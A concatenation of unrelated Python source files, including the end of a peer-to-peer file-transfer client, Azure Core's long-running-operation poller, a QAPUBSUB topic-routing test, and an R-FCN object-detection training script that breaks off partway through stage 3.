async def check_for_file_transfer_requests(self):
# 2. `Y -> S`: every one second, Y asks server for any requests
await self.write(bytes(FileTransferRequestResponsePackets()))
# 3. `S -> X/F -> Y`: server responds with active requests
file_transfer_requests = FileTransferCheckRequestsPackets(data=(await self.read())[4:]).requests
if not file_transfer_requests:
return
print("Incoming file transfer request(s):")
index_to_email = dict()
index_to_file_info = dict()
i = 1
for email, file_info in file_transfer_requests.items():
print("\t{}. {}".format(i, email))
print("\t\tname: ", file_info["name"])
print("\t\tsize: ", sizeof_fmt(int(file_info["size"])))
print("\t\tSHA256: ", file_info["SHA256"])
index_to_email[i] = email
index_to_file_info[i] = file_info
i += 1
try:
selection = input("\nEnter the number for which request you'd like to accept, or 0 to deny all: ")
accept = True
selection_num = int(selection)
if selection_num <= 0 or selection_num >= i:
raise ValueError
packets = FileTransferAcceptRequestPackets(index_to_email[selection_num])
        except (ValueError, KeyboardInterrupt):
packets = FileTransferAcceptRequestPackets("")
accept = False
if accept:
while True:
out_directory = input("Enter the output directory: ")
file_path = os.path.join(out_directory, index_to_file_info[selection_num]["name"])
if not os.path.isdir(out_directory):
print("The path {} is not a directory".format(os.path.abspath(out_directory)))
elif os.path.exists(file_path):
print("The file {} already exists".format(file_path))
elif not os.access(out_directory, os.X_OK | os.W_OK):
print("Cannot write file path {} permission denied.".format(file_path))
else:
break
# 4. `Y -> Yes/No -> S`: Y accepts or denies transfer request
await self.write(bytes(packets))
if not accept:
return False
# 5. `S -> Token -> Y`: if Y accepted, server sends a unique token Y
token = FileTransferSendTokenPackets(data=(await self.read())[4:]).token
lock = Lock()
progress = shared_memory.SharedMemory(create=True, size=8)
server_sentinel = shared_memory.SharedMemory(create=True, size=1)
status_sentinel = shared_memory.SharedMemory(create=True, size=1)
listen_port = shared_memory.SharedMemory(create=True, size=4)
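        # Shared-memory blocks used to coordinate with the P2P server process:
        # 'progress' holds two little-endian 32-bit counters read by the progress
        # printer, 'listen_port' receives the port the child binds to (0 until it is
        # listening), and the sentinels are single-byte flags (status_sentinel stops
        # the printer thread).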
# 6. `Y -> Port -> S`: Y binds to 0 (OS chooses) and sends the port it's listening on to S
p2p_server = P2PServer(token, os.path.abspath(out_directory), progress.name, lock, listen_port.name,
status_sentinel.name)
p2p_server_process = Process(target=p2p_server.run, args=(0, server_sentinel.name))
p2p_server_process.start()
print("Started P2P server. Waiting for listen...")
# wait for listen
port = 0
while port == 0:
with lock:
port = int.from_bytes(listen_port.buf, byteorder='little')
await self.write(bytes(FileTransferSendPortPackets(port)))
# Wait until file received
time_start = time.time()
chunk_size = FILE_TRANSFER_P2P_CHUNK_SIZE
def unguarded_print_received_progress(final=False):
utils.print_status(
*utils.get_progress(int.from_bytes(progress.buf[0:4], byteorder='little'),
int.from_bytes(progress.buf[4:8], byteorder='little'), chunk_size), "received",
final)
def print_received_progress():
while True:
with lock:
if status_sentinel.buf[0] == 1:
break
unguarded_print_received_progress()
time.sleep(0.03)
status_thread = Thread(target=print_received_progress)
status_thread.start()
try:
p2p_server_process.join()
except KeyboardInterrupt:
raise RuntimeError("User requested abort")
finally:
if p2p_server_process.is_alive():
p2p_server_process.terminate()
with lock:
status_sentinel.buf[0] = 1
status_thread.join()
unguarded_print_received_progress(final=True)
progress.close()
progress.unlink()
server_sentinel.close()
server_sentinel.unlink()
status_sentinel.close()
status_sentinel.unlink()
listen_port.close()
listen_port.unlink()
time_end = time.time()
print("File transfer completed successfully in {} seconds.".format(time_end - time_start))
return True
# X
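    # X is the sending peer: it asks the server to forward a transfer request to Y and,
    # once Y accepts, connects directly to Y's P2P server using the issued token and port.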
async def send_file(self):
msg = None
try:
# 1. `X -> Y/F -> S`: X wants to send F to Y
recipient_email = input("Enter the recipient's email address: ")
file_path = os.path.abspath(input("Enter the file path: "))
valid_email = validate_and_normalize_email(recipient_email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if not file_path:
raise RuntimeError("Empty file path.")
if not os.path.exists(file_path):
raise RuntimeError("Cannot find file: {}".format(file_path))
if not os.path.isfile(file_path):
raise RuntimeError("Not a file: {}".format(file_path))
file_base = os.path.basename(file_path)
file_size = os.path.getsize(file_path)
file_sha256 = sha256_file(file_path)
file_info = {
"name": file_base,
"size": file_size,
"SHA256": file_sha256,
}
# send request
await self.write(bytes(FileTransferRequestPackets(valid_email, file_info)))
# this only checks if the request is valid
# this does not check if the recipient accepted or denied the request
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
# 7. `S -> Token/Port -> X`: S sends the same token and port to X
# denied request is indicated by empty token and port
port_and_token = FileTransferSendPortTokenPackets(data=(await self.read())[4:])
port, token = port_and_token.port, port_and_token.token
if token and port:
print("User {} accepted the file transfer Connecting to recipient on port ".format(valid_email, port))
else:
raise RuntimeError("User {} declined the file transfer request".format(valid_email))
progress = shared_memory.SharedMemory(create=True, size=8)
progress_lock = Lock()
p2p_client = P2PClient(port, token, file_path, file_size, file_sha256, progress.name, progress_lock)
time_start = time.time()
sentinel = False
chunk_size = FILE_TRANSFER_P2P_CHUNK_SIZE
def unguarded_print_sent_progress(final=False):
utils.print_status(
*utils.get_progress(int.from_bytes(progress.buf[0:4], byteorder='little'),
int.from_bytes(progress.buf[4:8], byteorder='little'), chunk_size), "sent",
final)
def print_sent_progress():
while not sentinel:
with progress_lock:
unguarded_print_sent_progress()
time.sleep(0.03)
            # I was having trouble with asyncio.gather, so just run the status printer in a new thread
status_thread = Thread(target=print_sent_progress)
status_thread.start()
# wait until p2p transfer completes, unless keyboard interrupt
try:
await p2p_client.main()
except KeyboardInterrupt:
raise RuntimeError("User requested abort")
finally:
sentinel = True
status_thread.join()
unguarded_print_sent_progress(final=True)
progress.close()
progress.unlink()
time_end = time.time()
print("\nFile transfer completed in {} seconds.".format(time_end - time_start))
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to send file: ", msg)
def main(hostname=None, port=None, filename=None, debug=None):
nest_asyncio.apply()
hostname = hostname if hostname is not None else DEFAULT_HOSTNAME
port = port if port is not None else DEFAULT_PORT
filename = filename if filename is not None else DEFAULT_FILENAME
global DEBUG
DEBUG = debug if debug is not None else DEBUG_DEFAULT
Client(hostname, port, filename).run()
if __name__ == "__main__":
main()
|
_poller.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import threading
import uuid
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from typing import Any, Callable, Union, List, Optional, TypeVar, Generic, TYPE_CHECKING
from azure.core.pipeline.transport._base import HttpResponse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
import requests
from msrest.serialization import Model # pylint: disable=unused-import
DeserializationCallbackType = Union[Model, Callable[[requests.Response], Model]]
PollingReturnType = TypeVar("PollingReturnType")
class PollingMethod(Generic[PollingReturnType]):
"""ABC class for polling method.
"""
def initialize(self, client, initial_response, deserialization_callback):
# type: (Any, Any, Any) -> None
raise NotImplementedError("This method needs to be implemented")
def run(self):
# type: () -> None
raise NotImplementedError("This method needs to be implemented")
def status(self):
# type: () -> str
raise NotImplementedError("This method needs to be implemented")
def finished(self):
# type: () -> bool
raise NotImplementedError("This method needs to be implemented")
def resource(self):
# type: () -> PollingReturnType
raise NotImplementedError("This method needs to be implemented")
class NoPolling(PollingMethod):
"""An empty poller that returns the deserialized initial response.
"""
def __init__(self):
self._initial_response = None
self._deserialization_callback = None
def initialize(self, _, initial_response, deserialization_callback):
# type: (Any, requests.Response, Callable) -> None
self._initial_response = initial_response
self._deserialization_callback = deserialization_callback
def run(self):
# type: () -> None
"""Empty run, no polling.
"""
def status(self):
# type: () -> str
"""Return the current status as a string.
:rtype: str
"""
return "succeeded"
def finished(self):
# type: () -> bool
"""Is this polling finished?
:rtype: bool
"""
return True
def resource(self):
# type: () -> Any
return self._deserialization_callback(self._initial_response)
class LROPoller(Generic[PollingReturnType]):
"""Poller for long running operations.
:param client: A pipeline service client
:type client: ~azure.core.PipelineClient
:param initial_response: The initial call response
:type initial_response:
~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse
    :param deserialization_callback: A callback that takes a Response and returns a deserialized object.
If a subclass of Model is given, this passes "deserialize" as callback.
:type deserialization_callback: callable or msrest.serialization.Model
:param polling_method: The polling strategy to adopt
:type polling_method: ~azure.core.polling.PollingMethod
"""
def __init__(self, client, initial_response, deserialization_callback, polling_method):
# type: (Any, HttpResponse, DeserializationCallbackType, PollingMethod) -> None
self._client = client
self._response = initial_response
self._callbacks = [] # type: List[Callable]
self._polling_method = polling_method
# This implicit test avoids bringing in an explicit dependency on Model directly
try:
deserialization_callback = deserialization_callback.deserialize # type: ignore
except AttributeError:
pass
# Might raise a CloudError
self._polling_method.initialize(self._client, self._response, deserialization_callback)
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="LROPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
def _start(self):
"""Start the long running operation.
On completion, runs any callbacks.
:param callable update_cmd: The API request to check the status of
the operation.
"""
try:
self._polling_method.run()
except Exception as err: #pylint: disable=broad-except
self._exception = err
finally:
self._done.set()
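        # Drain the callback list repeatedly: callbacks registered while earlier ones
        # were running are picked up on the next pass of the loop.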
callbacks, self._callbacks = self._callbacks, []
while callbacks:
for call in callbacks:
call(self._polling_method)
callbacks, self._callbacks = self._callbacks, []
def status(self):
# type: () -> str
"""Returns the current status string.
:returns: The current status string
:rtype: str
"""
return self._polling_method.status()
def result(self, timeout=None):
# type: (Optional[int]) -> PollingReturnType
"""Return the result of the long running operation, or
the result available after the specified timeout.
:returns: The deserialized resource of the long running operation,
if one is available.
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
self.wait(timeout)
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a specified length
        of time. You can check whether this call has ended, within the given
        timeout, using the "done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
# https://github.com/python/mypy/issues/8165
raise self._exception # type: ignore
except TypeError: # Was None
pass
def done(self):
# type: () -> bool
"""Check status of the long running operation.
:returns: 'True' if the process has completed, else 'False'.
:rtype: bool
"""
return self._thread is None or not self._thread.is_alive()
def add_done_callback(self, func):
# type: (Callable) -> None
"""Add callback function to be run once the long running operation
has completed - regardless of the status of the operation.
:param callable func: Callback function that takes at least one
argument, a completed LongRunningOperation.
"""
# Still use "_done" and not "done", since CBs are executed inside the thread.
if self._done is None or self._done.is_set():
func(self._polling_method)
# Add it anyway, for consistency (in case you want to access it for some reason)
self._callbacks.append(func)
def remove_done_callback(self, func):
# type: (Callable) -> None
"""Remove a callback from the long running operation.
:param callable func: The function to be removed from the callbacks.
:raises ValueError: if the long running operation has already completed.
"""
if self._done is None or self._done.is_set():
raise ValueError("Process is complete.")
self._callbacks = [c for c in self._callbacks if c != func]
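# Usage sketch (illustrative only): "client", "initial_response" and
# "deserialization_callback" stand in for whatever your pipeline client
# provides; NoPolling (azure.core.polling) is shown as the strategy for an
# operation that is already complete.
#
#     poller = LROPoller(client, initial_response, deserialization_callback, NoPolling())
#     poller.wait(timeout=30)        # returns immediately here; no thread was started
#     if poller.done():
#         resource = poller.result() # deserialization_callback(initial_response)
#     print(poller.status())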
|
test_topic.py
|
#!/usr/bin/env python
import QAPUBSUB
import threading
from QAPUBSUB.consumer import subscriber_topic
from QAPUBSUB.producer import publisher_topic
z1 = subscriber_topic(exchange='testTopic', routing_key='#')
z2 = subscriber_topic(exchange='testTopic', routing_key='#.SZ')
z3 = subscriber_topic(exchange='testTopic', routing_key='#.SH')
z1.callback = lambda a, b, c, x: print('FROM X1 {}'.format(x))
z2.callback = lambda a, b, c, x: print('FROM X2 {}'.format(x))
z2.add_sub(exchange='testTopic', routing_key='000001.SZ')
z3.callback = lambda a, b, c, x: print('FROM X3 {}'.format(x))
p = publisher_topic(exchange='testTopic', )
threading.Thread(target=z1.start).start()
threading.Thread(target=z2.start).start()
threading.Thread(target=z3.start).start()
p.pub('000001', routing_key='000001.SZ')
p.pub('000002', routing_key='000002.SZ')
p.pub('601318', routing_key='601318.SH')
"""
在exchange为 xx的mq中
routing_key = x1 ==> 有一个订阅者 z1
routing_key = x2 ==> 有两个订阅者 z2, z3
"""
|
train_rfcn_alt_opt_5stage.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in the
NIPS 2015 paper "Faster R-CNN: Towards Real-Time Object Detection with Region
Proposal Networks" (Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun).
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R-FCN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ResNet-101")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--imdb_test', dest='imdb_test_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--model', dest='model_name',
help='folder name of model',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
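# Example invocation (hypothetical paths and model names; only the flags are
# taken from the parser above):
#   ./train_rfcn_alt_opt_5stage.py --gpu 0 \
#       --net_name ResNet-101 --model rfcn_alt_opt_5step_ohem \
#       --weights data/imagenet_models/ResNet-101-model.caffemodel \
#       --imdb voc_2007_trainval --imdb_test voc_2007_test \
#       --cfg experiments/cfgs/rfcn_alt_opt_5step_ohem.yml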
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
# R-FCN Alternating Optimization
# Solver for each training stage
if imdb_name.startswith('coco'):
solvers = [[net_name, model_name, 'stage1_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage2_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage3_rpn_solver360k480k.pt']]
solvers = [os.path.join('.', 'models', 'coco', *s) for s in solvers]
# Iterations for each training stage
max_iters = [480000, 480000, 480000, 480000, 480000]
else:
solvers = [[net_name, model_name, 'stage1_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage2_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage3_rpn_solver60k80k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 120000, 80000, 120000, 80000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, model_name, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_cache=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rpn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = 6000  # keep the top 6000 scoring boxes before NMS
cfg.TEST.RPN_POST_NMS_TOP_N = 300 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
# Generate proposals on the imdb
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
if not os.path.exists(rpn_proposals_path):
rpn_proposals = imdb_proposals(rpn_net, imdb)
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
queue.put({'proposal_path': rpn_proposals_path})
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_cache=None):
"""Train a R-FCN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False  # not generating proposals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train R-FCN
# Send R-FCN model path over the multiprocessing queue
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rfcn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rfcn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_compute_stats(queue=None, imdb_name=None, cfg=None, rpn_test_prototxt=None):
"""Compute mean stds for anchors
"""
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
roidb, imdb = get_roidb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
mean_file = os.path.join(imdb.cache_path, imdb.name + '_means.npy')
std_file = os.path.join(imdb.cache_path, imdb.name + '_stds.npy')
if os.path.exists(mean_file) and os.path.exists(std_file):
means = np.load(mean_file)
stds = np.load(std_file)
else:
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, caffe.TEST)
# Generate proposals on the imdb
print 'start computing means/stds, it may take several minutes...'
if imdb_name.startswith('coco'):
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(4, 8, 16, 32))
else:
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(8, 16, 32))
np.save(mean_file, means)
np.save(std_file, stds)
queue.put({'means': means, 'stds': stds})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicating results between processes
mp_queue = mp.Queue()
# solvers, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.imdb_name, args.net_name, args.model_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 0 RPN, compute normalization means and stds'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_compute_stats, kwargs=mp_kwargs)
p.start()
stage0_anchor_stats = mp_queue.get()
p.join()
cfg.TRAIN.RPN_NORMALIZE_MEANS = stage0_anchor_stats['means']
cfg.TRAIN.RPN_NORMALIZE_STDS = stage0_anchor_stats['stds']
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg,
output_cache='stage1_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate test proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 R-FCN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'],
output_cache='stage1_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage1 R-FCN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg,
output_cache='stage2_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 R-FCN using Stage-2 RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'],
output_cache='stage2_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 3 RPN, init from stage2 R-FCN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage3'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
